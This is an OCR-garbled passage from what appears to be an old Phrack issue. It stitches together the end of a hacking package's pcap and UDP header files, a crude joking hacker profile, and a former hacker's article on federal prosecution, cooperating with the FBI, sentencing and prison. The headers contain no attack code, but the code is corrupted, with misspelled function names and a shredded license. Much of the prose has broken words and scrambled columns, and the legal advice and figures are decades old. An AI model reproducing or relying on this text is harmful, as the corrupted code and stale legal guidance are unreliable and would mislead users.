struct in_addr saddr, daddr; /* source and dest address */ 
}; 
ifndef IP_MAXPACKET 
define IP_MAXPACKET 65535 
endif /* IP_MAXPACKET */ 
<--> 
<++> ADMIDpack/pcap.h 
/* 
* Copyright (c) 1993, 1994, 1995, 1996, 1997 


* 


Ae 


2. 


The Regents of the University of California. 


Redistribution a 
modification, 
are met: 


Redi 
noti 
Redi 


stributio 
ce, this 


stributions 


nd use in source and binary forms, 
are permitted provided that the 


ns of source code must 
list of conditions and 
in binary form must 


noti 


documentation 


All 


ce, this 


advertisi 


list of conditions and 
and/or other materials provided with the 
ng materials mentioning 


Al] 


rights reserved. 


with or without 
following conditions 


retain the above copyright 

the following disclaimer. 
reproduce the above copyright 

the following disclaimer in the 
distribution. 
this software 


features or use of 


must display the following acknowledgement: 


Neit 


her th 


nam 


to endorse or promote 
specific prior writte 
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ifnde 
defin 


lu 
lu 


inc 
inc 


inclu 


inclu 


) SH 


£ 
e 


< 
< 


de 
de 


de 


de < 


define PCAP_V 
define PCAP_V 


eader: 


lib_pcap_h 
lib_pcap_h 


sys/types.h> 
sys/time.h> 


<bpf.h> 


stdio.h> 


NO 
RI 


PROVIDE 
WA 


D 


This product includes software developed by the Computer Systems 
Engineering Group at Lawrence Berkeley Laboratory. 
of t 


he University nor of the Laboratory may be used 
products derived from this software without 
n permission. 
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ERSION_MINOR 4 
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#define PCAP_ERRBUF_SIZE 256 


/* 
* Compatibility for systems that have a bpf-.h that 
* predates the bpf typedefs for 64-bit support. 

A 

if BPF_RELEASE - 0 < 199406 

typedef int bpf_int32; 

typedef u_int bpf_u_int32; 

endif 


typedef struct pcap pcap_t; 
typedef struct pcap_dumper pcap_dumper_t; 


* The first record in the file contains saved values for some 
* of the flags used in the printout phases of tcpdump. 
* Many fields here are 32 bit ints so compilers won’t insert unwanted 
* padding; these files need to be interchangeable across architectures. 
ao 
struct pcap_file_header { 
bpf_u_int32 magic; 
u_short version_major; 
u_short version_minor; 


bpf_int32 thiszone; /* gmt to local correction */ 
bpf_u_int32 sigfigs; /* accuracy of timestamps */ 
bpf_u_int32 snaplen; /* max length saved portion of each pkt */ 


bpf_u_int32 linktype; /* data link type (DLT_*) */ 


* Each packet in the dump file is prepended with this generic header. 
* This gets around the problem of different headers for different 
* packet interfaces. 


av 
struct pcap_pkthdr { 
struct timeval ts; /* time stamp */ 
bpf_u_int32 caplen; /* length of portion present */ 
bpf_u_int32 len; /* length this packet (off wire) */ 
}; 
/* 
* As returned by the pcap_stats() 
xf 
struct pcap_stat { 
u_int ps_recv; /* number of packets received */ 
u_int ps_drop; /* number of packets dropped */ 
u_int ps_ifdrop; /* drops by interface XXX not yet supported */ 


}; 


typedef void (*pcap_handler) (u_char *, const struct pcap_pkthdr *, 
const u_char *); 


char *ocap_lookupdev(char *); 
int pcap_lookupnet (char *, bpf_u_int32 *, bpf_u_int32 *, char *); 
pcap_t *pcap_open_live(char *, int, int, int, char *); 

pcap_t *pcap_open_offline(const char *, char *); 


void pcap_close(pcap_t *); 
int pcap_loop(pcap_t *, int, pcap_handler, u_char *); 
int pcap_dispatch(pcap_t *, int, pcap_handler, u_char *); 


const u_char* 
pcap_next (pcap_t *, struct pcap_pkthdr *); 


int pcap_stats(pcap_t *, struct pcap_stat *); 

int pcap_setfilter(pcap_t *, struct bpf_program *); 

void pcap_perror(pcap_t *, char *); 

char *pocap_strerror (int); 

char *ocap_geterr(pcap_t *); 

int pcap_compile(pcap_t *, struct bpf_program *, char *, int, 
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bpf_u_int32); 


/* XXX */ 

int pcap_freecode(pcap_t *, struct bpf_program *); 
int pcap_datalink(pcap_t *); 

int pcap_snapshot (pcap_t *); 

int pcap_is_swapped(pcap_t *); 

int pcap_major_version(pcap_t *); 

int pcap_minor_version(pcap_t *); 

/* XXX */ 

FILE *pcap_file(pcap_t *); 

int pcap_fileno(pcap_t *); 


pcap_dumper_t *pcap_dump_open(pcap_t *, const char *); 
void pcap_dump_close(pcap_dumper_t *); 
void pcap_dump (u_char *, const struct pcap_pkthdr *, const u_char *); 


/* XXX this guy lives in the bpf tree */ 


u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int); 
char *bpf_image (struct bpf_insn *, int); 

#endif 

<--> 


<++> ADMIDpack/udp.h 
struct udphdr { 


u_short source; /* source port */ 

u_short dest; /* destination port */ 
u_short len; /* udp length */ 
u_short check; /* udp checksum */ 
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[ PHRACK 5 2 P Ro +P. sH) Te Deck 
[ Personal 
Handle: O00 
Call him: pachuco. Hey... me. 


Past handles: 
Handle origin: 


digital jesus 
L. Ron Hubbard and I thought it up. 


Date of Birth: 07/74 
Height: With heels or without? 
Weight: In the sixth grade I was in a roman play. I was Naples. 
Eye color: Blue. 
Hair Color: Blue. I’m old. 
Computers: Yes please. Extra Mayo, No onions. 


Admin of: 
Sites Frequented: 


URLs: 


[ 


Women: 
Cars: 
Foods: 


Music: 


Movies: 


Books: 


Quotes: 


Turn Ons: 


Turn: Offs: 


[ 


Business (penetra 
Tropical places ( 


Nothing. I’m not an admin. 

www.scientology.org (If you are going to hack someone, 
hack me.) 

The web is a really good excuse to waste time unless 

you are doing research, distributing religous propaganda, 
or selling sex oriented products. 


Favorite Things 


Daemon9, are you trying to ask me something? 

Porsche Carrera whatever 

The Roxy in Encinitas, Ca., Filibertos in Encinitas, Ca., 
and of course, "deli world" in the San Francisco ghetto 
(Excelsior). $1 food is next door. 

Fugazi, Jazz, Acid Jazz, Lounge, Gregorian Chant, Jon 
Spencer - Orange, One Dollar Food (Mondays at the Red 
Devil Lounge in SF Feds Welcome, but have good suits and 
fast sneakers so I know who you are) 

Usual Suspects, Ferris Buellers Day Off, Mall Rats, 
Anything not starring pauly shore or Rodney Dangerfield. 
Chaos, making a new science by James Gleick 

The C programming language, by Wik, and AlsO wik. 

"Why I just can’t seem to dance" -— A documentary by Daemon9 
"Hell hath no fury like a woman’s scorn for Sega" - Brodie. 
"Woohoo! The water in this bathtub sure is ... white!" 

-— B. Clinton. 

"Woohoo! Jessie Jackson sure is black!" -— Pat Buchanan. 

"I just never can seem to find things when I need them" 

- Ollie North. 

"People will eat shit, if you just put salad dressing on 
it." - B. Gates. 

"ARF! grr." -— Tattoo. 

* Miniskirts, Garders, Vinyl, Perfume, Meat Eaters, Smart 
Girls without attitudes. 

* Fat, ugly, smelly, vegetarian "granolas" with no 
personality who wear 20 year old clothes that they still 
have not washed yet, and lack the social skills or 
capacity to learn. 

* Salespeople 


Passions 


tion testing / security auditing). 
relaxation). 


Urban places (excitement). 


—- Winky, the magic dog, mule, hare catcher. 
— Computers / networking. 


-— My girlfriend. 
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- Europe in general (but honestly, if you are Dutch and you own a restaurant, 
come to the US, and learn about ground beef. Also, figure out what "well 
done" means. Honestly though, I must compliment you on your excellent 
selection of various strains of marijuana). 


[ Memorable experiences 


—- Owning switches over the Internet (TCP --> X.25). 

—- Owning my first nice car. 

— Owning your machine. 

— Getting punched by a large Sicilian, and getting knocked out. 
—- Putting a large Sicilian in the hospital. 


[ People to mention 


- Joan Croc, for all of the millions of dollars she never gave m 

—- Daemon9, for patting me on the back and breaking my spine by accident. 

—- My girlfriend, for being the awesome girl next door. 

— Her parents, for feeding me all the time. 

—- Tattoo, my puppy ... for pissing on my bed, my floor, and all my clothes. 

—- Everyone who has ever served me coff 

- Everyone who has ever betrayed me. Thanks so much for your warmth and 

compassion. 

-— Mr Rogers. Using drugs to teach America’s youth the moral responsibilities 

they should adopt for their upcoming, bright futures, and using puppets to 

illustrate the values of a smoothly flowing dictatorship. 

-— My parents, for tolerating all the weird phone calls from the rest of you 
fuckers for many years, and for motivating me to learn about things I was 
interested in by telling me that I would never get a job if I didn’t go to 
college. Heck, at least I didn’t buy a degree out of a magazine, and end up 
President of the United States. 

- Oprah, for providing me with entertainment while I watched you expand and 


contract like a blowfish. (I don’t think she reads this anyway) (But if I’m 
wrong, and Oprah is an avid phrack reader, then by all means .. sorry , it 
was only a joke... Besides, according to MiB, you’re an alien). 


[ Pearls Of Wisdom 


- Don’t take any wooden nickels, but if you do, make sure you get enough to 
build a log cabin. Don’t take any log cabins, but of you do, cut them up 
small enough that you can give alot of people wooden nickels. 

- Don’t make up any cliches, but if you do, make sure they’re funny. 

- Make your business work for you, don’t work for your business. 

— Never ignore the ones you love. 


—- Buy quality merchandise for your home the first time around... unless you 
have roommates. 
If everyon lse around you gets caught, its time to stop. 


- If a speaker is a speaker, and not a "Sound emissions device", then is 
toilet paper "toilet paper", or "Butt Wiping Cloth?" 

—- Eat out alot, unless she tells you to stop. 

—- All the people who consistently come on irc and ask "teach me how to hack", 
first of all, most of the people on irc understand English as well as its 
associated rules of grammar. Second, pick up a fricking book once ina 
while and you might actually be surprised at what you are capable of. We’re 
supposed to be evolving, remember? 

- When I was a young boy, I ate a snail. If you are a young boy, don’t. 

- If you beat the shit out of someone, make sure its not in front of my house, 
because I don’t want to clean up all that shit. 


----[ EOF 
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sound a little harsh, but considering the fact that the U.S. Attorney’s Office 


has a 95% conviction rate, it may be sage advice. However, I don’t want to 
gloss over the importance of a ready for trial posturing. If you have a 


strong trial attorney, and have a strong case, it will go a long way towards 
good plea bargain negotiations. 


C. PLEA AGREEMENTS AND ATTORNEYS 


Your attorney can be your worst foe or your finest advocate. Finding 
the proper one can be a difficult task. Costs will vary and typically the 
attorney asks you how much cash you can raise and then says, "that amount will 
be fine". In actuality a simple plea and sentencing should run you around 
$15,000. Trial fees can easily soar into the 6 figure category. And finally, 
a post conviction specialist will charge $5000 to $15,000 to handle your 
sentencing presentation with final arguments. 


You may however, find yourself at the mercy of The Public Defenders 
Office. Usually they are worthless, occasionally you’1ll find one that will 
fight for you. Essentially it’s a crap shoot. All I can say is if you don’t 
like the one you have, fire them and hope you get appointed a better one. If 
you can scrape together $5000 for a sentencing (post conviction) specialist to 
work with your public defender I would highly recommend it. This specialist 
will make certain the judge sees the whole picture and will argue in the most 

ffective manner for a light or reasonable sentence. Do not rely on your 

public defender to thoroughly present your case. Your sentencing hearing is 
going to flash by so fast you’1ll walk out of the court room dizzy. You and 
your defense team need to go into that hearing fully prepared, having already 
filed a sentencing memorandum. 


The plea agreement you sign is going to affect you and your case well 
after you are sentenced. Plea agreements can be tricky business and if you 
are not careful or are in a bad defense position (the case against you is 
strong), your agreement may get the best of you. There are many issues ina 
plea to negotiate over. But essentially my advice would be to avoid signing 
away your right to appeal. Once you get to a real prison with real jailhouse 
lawyers you will find out how bad you got screwed. That issue notwithstanding, 
you are most likely going to want to appeal. This being the case you need to 
remember two things: bring all your appealable issues up at sentencing and 
file a notice of appeal within 10 days of your sentencing. Snooze and loose. 


I should however, mention that you can appeal some issues even though 
you signed away your rights to appeal. For example, you can not sign away 
your right to appeal an illegal sentence. If the judge orders something that 
is not permissible by statute, you then have a constitutional right to appeal 
your sentence. 


I will close this subpart with a prison joke. Q: How can you tell when 
your attorney is lying? A: You can see his lips moving. 


D. CONSPIRACY 


Whatever happened to getting off on a technicality? I’m sorry to say 
those days are gone, left only to the movies. The courts generally dismiss 

many arguments as "harmless error" or "the government acted in good faith". 

The most alarming trend, and surely the root of the prosecutions success, are 
the liberally worded conspiracy laws. Quite simply, if two or more people 
p 
fo) 
rT 


lan to do something illegal, then one of them does something in furtherance 
f the objective (even something legal), then it’s a crime. Yes, it’s true. 
n America it’s illegal to simply talk about committing a crime. Paging Mr. 
Orwell. Hello? 


Here’s a hypothetical example to clarify this. Bill G. and Marc A. are 
hackers (can you imagine?) Bill and Marc are talking on the phone and 
unbeknownst to them the FBI is recording the call. They talk about hacking 
into Apple’s mainframe and erasing the prototype of the new Apple Web Browser. 
Later that day, Marc does some legitimate research to find out what type of 
mainframe and operating system Apple uses. The next morning, the Feds raid 
Marc’s house and seize everything that has wires. Bill and Marc go to trial 
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and spend millions to defend themselves. They are both found guilty of 
conspiracy to commit unauthorized access to a computer system. 


E. SENTENCING 


At this point it is up to the probation department to prepare a report 
for the court. It is their responsibility to calculate the loss and identify 
any aggravating or mitigating circumstances. Apple Computer Corporation 
estimates that if Bill and Marc would have been successful it would have 
resulted in a loss of $2 million. This is the figure the court will use. 
Based on this basic scenario our dynamic duo would receive roughly three-year 
sentences. 


As I mentioned, sentencing is complex and many factors can decrease or 
increase a sentence, usually the latter. Let’s say that the FBI also found a 
file on Marc’s computer with 50,000 unauthorized account numbers and passwords 
to The Microsoft Network. Even if the FBI does not charge him with this, it 
could be used to increase his sentence. Generally the government places a 
$200-per-account attempted loss on things of this nature (i.e. credit card 
numbers and passwords = access devices). This makes for a $10 million loss. 
Coupled with the $2 million from Apple, Marc is going away for about nine 
years. Fortunately there is a Federal Prison not too far from Redmond, WA so 
Bill could come visit him. 


Some of the other factors to be used in the calculation of a sentence 
might include the following: past criminal record, how big your role in the 
offense was, mental disabilities, whether or not you were on probation at the 
time of the offense, if any weapons were used, if any threats were used, if 
your name is Kevin Mitnick (heh), if an elderly person was victimized, if you 
took advantage of your employment position, if you are highly trained and used 
your special skill, if you cooperated with the authorities, if you show 
remorse, if you went to trial, etc. 


These are just some of the many factors that could either increase or 


decrease a sentence. It would be beyond the scope of this article to cover 
the U.S.S.G. in complete detail. I do feel that I have skipped over some 
Significant issues. Nevertheless, if you remember my two main points in 


addition to how the conspiracy law works, you’ll be a long way ahead in 
protecting yourself. 


F. USE OF A SPECIAL SKILL 


The only specific "sentencing enhancement" I would like to cover would 
be one that I am responsible for setting a precedent with. In U.S. v Petersen, 
98 F.3d. 502, 9th Cir., the United States Court of Appeals held that some 
computer hackers may qualify for the special skill enhancement. What this 
generally means is a 6 to 24 month increase in a sentence. In my case it 
added eight months to my 33-month sentence bringing it to 41 months. 
Essentially the court stated that since I used my "Sophisticated" hacking 
skills towards a legitimate end as a computer security consultant, then the 
enhancement applies. It’s ironic that if I were to have remained strictly a 
criminal hacker then I would have served less time. 


The moral of the story is that the government will find ways to give 
you as much time as they want to. The U.S.S.G. came into effect in 1987 in an 
attempt to eliminate disparity in sentencing. Defendants with similar crimes 
and similar backgrounds would often receive different sentences. Unfortunately, 
this practice still continues. The U.S.S.G. are indeed a failure. 


G. GETTING BAIL 


In the past, the Feds might simply hav xecuted their raid and then 
left without arresting you. Presently this method will be the exception 
rather than the rule and it is more likely that you will be taken into custody 


at the time of the raid. Chances are also good that you will not be released 
on bail. This is part of the government’s plan to break you down and win their 
case. If they can find any reason to deny you bail they will. In order to 
qualify for bail, you must meet the following criteria: 
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- You must be a resident of the jurisdiction in which you were arrested. 
—- You must be gainfully employed or have family ties to the area. 

- You cannot have a history of failure to appear or escape. 

- You cannot be considered a danger or threat to the community. 


In addition, your bail can be denied for the following reasons: 


Someone came forward and stated to the court that you said you would flee if 
released. 

- Your sentence will be long if convicted. 

- You have a prior criminal history. 

—- You have pending charges in another jurisdiction. 


What results from all this "bail reform" is that only about 20% of 
persons arrested make bail. On top of that it takes 1-3 weeks to process your 
bail papers when property is involved in securing your bond. 


Now you’re in jail, more specifically you are either in an 
administrative holding facility or a county jail that has a contract with the 
Feds to hold their prisoners. Pray that you are in a large enough city to 
justify its own Federal Detention Center. County jails are typically the last 
place you would want to be. 


H. STATE VS. FEDERAL CHARGES 


In some cases you will be facing state charges with the possibility of 
the Feds "picking them up." You may even be able to nudge the Feds into 
indicting you. This is a tough decision. With the state you will do 
considerably less time, but will face a tougher crowd and conditions in prison. 
Granted, Federal Prisons can be violent too, but generally as a non-violent 
white collar criminal you will eventually be placed into an environment with 
other low security inmates. More on this later. 


Until you are sentenced, you will remain as a "pretrial inmate" in 
general population with other inmates. Some of the other inmates will be 
predatorial but the Feds do not tolerate much nonsense. If someone acts up, 
they’1l get thrown in the hole. If they continue to pose a threat to the 
inmate population, they will be left in segregation (the hole). Occasionally 
inmates that are at risk or that have been threatened will be placed in 
segregation. This isn’t really to protect the inmate. It is to protect the 
prison from a lawsuit should the inmate get injured. 


I. COOPERATING 


Naturally when you are first arrested the suits will want to talk to 
you. First at your residence and, if you appear to be talkative, they will 
take you back to their offices for an extended chat and a cup of coffee. My 
advice at this point is tried and true and we’ve all heard it before: remain 
silent and ask to speak with an attorney. Regardless of what the situation is, 
or how you plan to proceed, there is nothing you can say that will help you. 
Nothing. Even if you know that you are going to cooperate, this is not the 
time. 


This is obviously a controversial subject, but the fact of the matter 
is roughly 80% of all defendants eventually confess and implicate others. This 
trend stems from the extremely long sentences the Feds are handing out these 
days. Not many people want to do 10 to 20 years to save their buddies’ hides 
when they could be doing 3 to 5. This is a decision each individual needs to 
make. My only advice would be to save your close friends and family. Anyone 
else is fair game. In the prison system the blacks have a saying "Getting 

down first." It’s no secret that the first defendant in a conspiracy is 
usually going to get the best deal. I’ve even seen situations where the big 
fish turned in all his little fish and received 40% off his sentence. 


Incidentally, being debriefed or interrogated by the Feds can be an 
ordeal in itself. I would -highly- recommend reading up on interrogation 
techniques ahead of time. Once you know their methods it will be all quite 
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transparent to you and the debriefing goes much more smoothly. 


When you make a deal with the government you’re making a deal with the 
devil himself. If you make any mistakes they will renege on the deal and 
you’ll get nothing. On some occasions the government will trick you into 
thinking they want you to cooperate when they are not really interested in 
anything you have to say. They just want you to plead guilty. When you sign 
the cooperation agreement there are no set promises as to how much of a 
sentence reduction you will receive. That is to be decided after your 
testimony, etc. and at the time of sentencing. It’s entirely up to the judge. 
However, the prosecution makes the recommendation and the judge generally goes 
along with it. In fact, if the prosecution does not motion the court for your 
"downward departure" the courts’ hands are tied and you get no break. 


As you can see, cooperating is a tricky business. Most people, 
particularly those who have never spent a day in jail, will tell you not to 


cooperate. "Don’t snitch." This is a noble stance to take. However, in some 
situations this is just plain stupid. Saving someone’s ass who would easily 
do the same to you is a tough call. It’s something that needs careful 


consideration. Like I said, save your friends then do what you have to do to 
get out of prison and on with your life. 


I’m happy to say that I was able to avoid involving my good friends 
and a former employer in the massive investigation that surrounded my case. It 
wasn’t easy. I had to walk a fine line. Many of you probably know that I 
(Agent Steal) went to work for the FBI after I was arrested. I was 


responsible for teaching several agents about hacking and the culture. What 
many of you don’t know is that I had close FBI ties prior to my arrest. I was 
involved in hacking for over 15 years and had worked as a computer security 
consultant. That is why I was given that opportunity. It is unlikely however, 
that we will see many more of these types of arrangements in the future. Our 
relationship ran afoul, mostly due to their passive negligence and lack of 
xperience in dealing with hackers. The government in general now has their 
own resources, experience, and undercover agents within the community. They 
no longer need hackers to show them the ropes or the latest security hole. 


Nevertheless, if you are in the position to tell the Feds something 
they don’t know and help them build a case against someone, you may qualify 
for a sentence reduction. The typical range is 20% to 70%. Usually it’s 
around 35% to 50%. Sometimes you may find yourself at the end of the 
prosecutorial food chain and the government will not let you cooperate. Kevin 
Mitnick would be a good example of this. Even if he wanted to roll over, I 
doubt it would get him much. He’s just too big of a fish, too much media. My 
final advice in this matter is get the deal in writing before you start 
cooperating. 


The Feds also like it when you "come clean" and accept responsibility. 
There is a provision in the Sentencing Guidelines, 3E1.1, that knocks a little 
bit of time off if you confess to your crime, plead guilty and show remorse. 
If you go to trial, typically you will not qualify for this "acceptance of 
responsibility" and your sentence will be longer. 


J. STILL THINKING ABOUT TRIAL 


Many hackers may remember the Craig Neidorf case over the famous 911 
System Operation documents. Craig won his case when it was discovered that 
the manual in question, that he had published in Phrack magazine, was not 
proprietary as claimed but available publicly from AT&T. It was an egg in 
the face day for the Secret Servic 


Don’t be misled by this. The government learned a lot from this 
fiasco and even with the laudable support from the EFF, Craig narrowly 
thwarted off a conviction. Regardless, it was a trying experience (no pun 


intended) for him and his attorneys. The point I’m trying to make is that it’s 
tough to beat the Feds. They play dirty and will do just about anything, 
including lie, to win their case. If you want to really win you need to know 


how they build a case in the first place. 
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K. SEARCH AND SEIZURE 


There is a document entitled "Federal Guidelines For Searching And 
Seizing Computers." It first came to my attention when it was published in 
the 12-21-94 edition of the Criminal Law Reporter by the Bureau of National 
Affairs (Cite as 56 CRL 2023 ). It’s an intriguing collection of tips, cases, 
mistakes and, in general, how to bust computer hackers. It’s recommended 
reading. 


Search and seizure is an ever evolving jurisprudence. What’s not 
permissible today may, through some convoluted Supreme Court logic, be 
permissible and legal tomorrow. Again, a complete treatment of this subject 
is beyond the scope of this paper. But suffice it to say if a Federal agent 
wants to walk right into your bedroom and seize all of your computer equipment 
without a warrant he could do it by simply saying he had probable cause (PC). 
PC is anything that gives him an inkling to believe you were committing a 
crime. Police have been known to find PC to search a car when the trunk sat 
too low to the ground or the high beams were always on. 


L. SURVEILLANCE AND WIRETAPS 


Fortunately the Feds still have to show a little restraint when 
wielding their wiretaps. It requires a court order and they have to show that 
there is no other way to obtain the information they seek, a last resort if 
you will. Wiretaps are also expensive to operate. They have to lease lines 
from the phone company, pay agents to monitor it 24 hours a day and then 
transcribe it. If we are talking about a data tap, there are additional costs. 
Expensive interception/translation equipment must be in place to negotiate the 
various modem speeds. Then the data has to be stored, deciphered, 
decompressed, formatted, protocoled, etc. It’s a daunting task and usually 
reserved for only the highest profile cases. If the Feds can seize the data 
from any other source, like the service provider or victim, they will take 
that route. I don’t know what they hate worse though, asking for outside help 
or wasting valuable internal resources. 


The simplest method is to enlist the help of an informant who will 
testify "I saw him do it!," then obtain a search warrant to seize th videnc 
on your computer. Ba da boom, ba da busted. 


Other devices include a pen register which is a device that logs every 
digit you dial on your phone and the length of the calls, both incoming and 
outgoing. The phone companies keep racks of them at their security 
departments. They can place one on your line within a day if they feel you are 
defrauding them. They don’t need a court order, but the Feds do. 


A trap, or trap and trace, is typically any method the phone company 
uses to log every number that calls a particular number. This can be done on 
the switching system level or via a billing database search. The Feds need a 
court order for this information too. However, I’ve heard stories of 
cooperative telco security investigations passing the information along to an 
agent. Naturally that would be a "harmless error while acting in good faith." 
(legal humor)... 


I’d love to tell you more about FBI wiretaps but this is as far as I 


can go without pissing them off. Everything I’ve told you thus far is public 
knowledge. So I think I’1l stop here. If you really want to know more, catch 
Kevin Poulsen (Dark Dante) at a cocktail party, buy him a Coke and he’1l give 
you an earful. (hacker humor) 


In closing this subpart I will say that most electronic surveillance 
is backed up with at least part-time physical surveillance. The Feds ar 
often good at following people around. They like late model mid-sized 
American cars, very stock, with no decals or bumper stickers. If you really 
want to know if you’re under surveillance, buy an Opto-electronics Scout or 
Xplorer frequency counter. Hide it on your person, stick an ear plug in your 
ear (for the Xplorer) and take it everywhere you go. If you hear people 
talking about you, or you continue to hear intermittent static (encrypted 
speech), you probably have a problem. 
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M. YOUR PRESENTENCE INVESTIGATION REPORT, PSI OR PSR 


After you plead guilty you will be dragged from the quiet and comfort 
of your prison cell to meet with a probation officer. This has absolutely 
nothing to do with getting probation. Quite the contrary. The P.O. is 
empowered by the court to prepare a complete and, in theory, unbiased profile 
of the defendant. Everything from education, criminal history, psychological 
behavior, offense characteristics plus more will be included in this 
voluminous and painfully detailed report about your life. Every little dirty 
scrap of information that makes you look like a sociopath, demon worshiping, 
loathsome criminal will be included in this report. They’ll put a few negative 
things in there as well 


My advice is simple. Be careful what you tell them. Have your 
attorney present and think about how what you say can be used against you. 
Here’s an example: 


P.O.: Tell me about your education and what you like to do in your spare time. 


Mr. Steal: I am preparing to enroll in my final year of college. In my spare 
time I work for charity helping orphan children. 


The PSR then reads "Mr. Steal has never completed his education and hangs 
around with little children in his spare time." Get the picture? 
J. PROCEEDING PRO SE 


Pro Se or Pro Per is when a defendant represents himself. A famous 
lawyer once said "a man that represents himself has a fool for a client." 
Truer words were never spoken. However, I can’t stress how important it is to 
fully understand the criminal justice system. Even if you have a great 
attorney it’s good to be able to keep an eye on him or even help out. An 
ducated client’s help can be of enormous benefit to an attorney. They may 
think you’re a pain in the ass but it’s your life. Take a hold of it. 
Regardless, representing yourself is generally a mistake. 


However, after your appeal, when your court appointed attorney runs 
out on you, or you have run out of funds, you will be forced to handle matters 
yourself. At this point there are legal avenues, although quite bleak, for 
post-conviction relief. 


But I digress. The best place to start in understanding the legal 
system lies in thr inexpensive books. First the Federal Sentencing 
Guidelines ($14.00) and Federal Criminal Codes and Rules ($20.00) are 
available from West Publishing at 800-328-9352. I consider possession of 
these books to be mandatory for any pretrial inmate. Second would be the 
Georgetown Law Journal, available from Georgetown University Bookstore in 
Washington, DC. The book sells for around $40.00 but if you write them a 
letter and tell them you’re a Pro Se litigant they will send it for free. And 
last but not least the definitive Pro Se authority, "The Prisoners Self Help 
Litigation Manual" $29.95 ISBN 0-379-20831-8. Or try 
http://www.oceanalaw.com/books/n148.htm 


I 


O. EVID 


INTIARY HEARING 


If you disagree with some of the information presented in the 
presentence report (PSR) you may be entitled to a special hearing. This can 
be instrumental in lowering your sentence or correcting your PSR. One 
important thing to know is that your PSR will follow you the whole time you 
are incarcerated. The Bureau of Prisons uses the PSR to decide how to handle 
you. This can affect your security level, your halfway house, your 
eligibility for the drug program (which gives you a year off your sentence), 
and your medical care. So make sure your PSR is accurate before you get 
sentenced! 


P. GETTING YOUR PROPERTY BACK 
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In most cases it will be necessary to formally ask the court to have 
your property returned. They are not going to just call you up and say "Do 
you want this Spare Station back or what?" No, they would just as soon keep it 
and not asking for it is as good as telling them they can have it. 


You will need to file a 41(e) "Motion For Return Of Property." The 
courts’ authority to keep your stuff is not always clear and will have to be 
taken on a case-by-case basis. They may not care and the judge will simply 
order that it be returned. 


If you don’t know how to write a motion, just send a formal letter to 
the judge asking for it back. Tell him you need it for your job. This should 
suffice, but there may be a filing fee. 


Q. OUTSTANDING WARRANTS 


If you have an outstanding warrant or charges pending in another 
jurisdiction you would be wise to deal with them as soon as possible -after- 
you are sentenced. If you follow the correct procedure chances are good the 
warrants will be dropped (quashed). In the worst case scenario, you will be 
transported to the appropriate jurisdiction, plead guilty and have your "time 
run concurrent." Typically in non-violent crimes you can serve several 
sentences all at the same time. Many Federal inmates have their state time 
run with their Federal time. In a nutshell: concurrent is good, consecutive 
bad. 


This procedure is referred to as the Interstate Agreement On Detainers 
Act (IADA). You may also file a "demand for speedy trial", with the 
appropriate court. This starts the meter running. If they don’t extradite 
you within a certain period of time, the charges will have to be dropped. The 
"Inmates’ Self-Help Litigation Manual" that I mentioned earlier covers this 
topic quite well. 


R. ENCRYPTION 


There are probably a few of you out there saying, "I triple DES 
encrypt my hard drive and 128 character RSA public key it for safety." Well, 
that’s just great, but... the Feds can have a grand jury subpoena your 
passwords and if you don’t give them up you may be charged with obstruction of 
justice. Of course who’s to say otherwise if you forgot your password in all 
the excitement of getting arrested. I think I heard this once or twice before 
in a Senate Sub-committee hearing. "Senator, I have no recollection of the 
aforementioned events at this time." But seriously, strong encryption is 
great. However, it would be foolish to rely on it. If the Feds have your 
computer and access to your encryption software itself, it is likely they 
could break it given the motivation. If you understand the true art of code 
breaking you should understand this. People often overlook the fact that your 
password, the one you use to access your encryption program, is typically less 
than 8 characters long. By attacking the access to your encryption program 
with a keyboard emulation sequencer your triple DES/128 bit RSA crypto is 
worthless. Just remember, encryption may not protect you. 


S. LEGAL SUMMARY 


Before I move on to the Life in Prison subpart, let me tell you what 
this all means. You’re going to get busted, lose everything you own, not get 
out on bail, snitch on your enemies, get even more time than you expected and 
have to put up with a bunch of idiots in prison. Sound fun? Keep hacking. 
And, if possible, work on those sensitive .gov sites. That way they can hang 
an espionage rap on you. That will carry about 12 to 18 years for a first 
time offender. 


I know this may all sound a bit bleak, but the stakes for hackers have 
gone up and you need to know what they are. Let’s take a look at some recent 
sentences: 


Agent Steal (me) 41 months 
Kevin Poulsen 51 months 
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Minor Threat 70 months 
Kevin Mitnick estimated 7-9 years 


As you can see, the Feds are giving out some time now. If you are 
young, a first-time offender, unsophisticated (like MOD), and were just 
looking around in some little company’s database, you might get probation. But 
chances are that if that is all you were doing, you would have been passed 
over for prosecution. As a rule, the Feds won’t take the case unless $10,000 
in damages are involved. The problem is who is to say what the loss is? The 
company can say whatever figure it likes and it would be tough to prove 


otherwise. They may decide to, for insurance purposes, blame some huge 
downtime expense on you. I can hear it now, “When we detected the intruder, 

we promptly took our system off-line. It took us two weeks to bring it up 
again for a loss in wasted manpower of $2 million." In some cases you might 

be better off just using the company’s payroll system to cut you a couple of 
$10,000 checks. That way the government has a firm loss figure. This would 
result in a much shorter sentence. I’m not advocating blatant criminal actions. 


I just think the sentencing guidelines definitely need some work. 


PART II - FEDERAL PRISON 


[J 


A. STATE v. FEDERAL 


In most cases I would say that doing time in a Federal Prison is better 
than doing time in the state institutions. Some state prisons are such 

violent and pathetic places that it’s worth doing a little more time in the 
Federal system. This is going to be changing however. The public seems to 
think that prisons are too comfortable and as a result Congress has passed a 
few bills to toughen things up. 


Federal prisons are generally going to be somewhat less crowded, 
cleaner, and more laid back. The prison I was at looked a lot like a college 
campus with plenty of grass and trees, rolling hills, and stucco buildings. I 
spent most of my time in the library hanging out with Minor Threat. We would 
argue over who was more elite. "My sentence was longer," he would argue. "I 
was in more books and newspapers," I would rebut. (humor) 


Exceptions to the Fed is better rule would be states that permit 
televisions and word processors in your cell. As I sit here just prior to 
release scribbling this article with pen and paper I yearn for even a Smith 
Corona with one line display. The states have varying privileges. You could 
wind up someplace wher verything gets stolen from you. There are also 
states that are abolishing parole, thus taking away the ability to get out 
early with good behavior. That is what the Feds did. 


B. SECURITY LEVELS 


The Bureau of Prisons (BOP) has six security levels. Prisons are 
assigned a security level and only prisoners with the appropriate ratings are 
housed there. Often the BOP will have two or three facilities at one location. 
Still, they are essentially separate prisons, divided by fences. 


The lowest level facility is called a minimum, a camp, or FPC. 
Generally speaking, you will find first time, non-violent offenders with less 
than 10 year sentences there. Camps have no fences. Your work assignment at 
a camp is usually off the prison grounds at a nearby military base. Other 
times camps operate as support for other nearby prisons. 


The next level up is a low Federal Correctional Institution (FCI). 
These are where you find a lot of people who should be in a camp but for some 
technical reason didn’t qualify. There is a double fence with razor wire 
surrounding it. Again you will find mostly non-violent types here. You would 
really have to piss someone off before they would take a swing at you. 

